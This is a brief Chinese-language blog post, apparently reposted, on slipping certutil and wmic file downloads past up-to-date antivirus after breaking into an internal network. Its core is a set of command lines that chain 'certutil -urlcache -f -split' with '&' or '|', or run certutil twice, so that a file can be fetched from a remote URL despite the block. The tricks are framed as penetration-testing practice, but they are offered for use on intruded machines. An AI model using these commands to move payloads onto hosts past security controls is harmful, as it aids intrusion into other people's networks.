前言

一般進內網過后我都會使用certutil下載文件，但在最近打一台內網機子的時候出現了certutil拒絕訪問的情況，在本地搭建了一個環境嘗試繞過certutil下載文件。

certutil繞過

安裝殺軟更新到最新版本，開啟所有防護，cmd下載certutil攔截如下：

方法一：用&和|繞過，語句如下

Certutil & Certutil –urlcache –f –split url

Certutil | Certutil –urlcache –f –split url

可以看到之前拒絕訪問后下載成功

方法二：二次執行certutil

先執行一次certutil，再執行下載語句

想到這里，我試着用wmic方式下載，也是被攔截

於是嘗試了跟certutil相同的方法，方法二可行如下

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 使用wmic.exe繞過應用程序白名單（多種方法）強大的WMIC wmic命令 wmic 命令使用詳解 WMIC命令的利用技巧 windows WMIC 命令 Windows WMIC命令使用詳解1 wmic命令用法小例 wmic 操作文件的datafile 使用CertUtil.exe下載遠程文件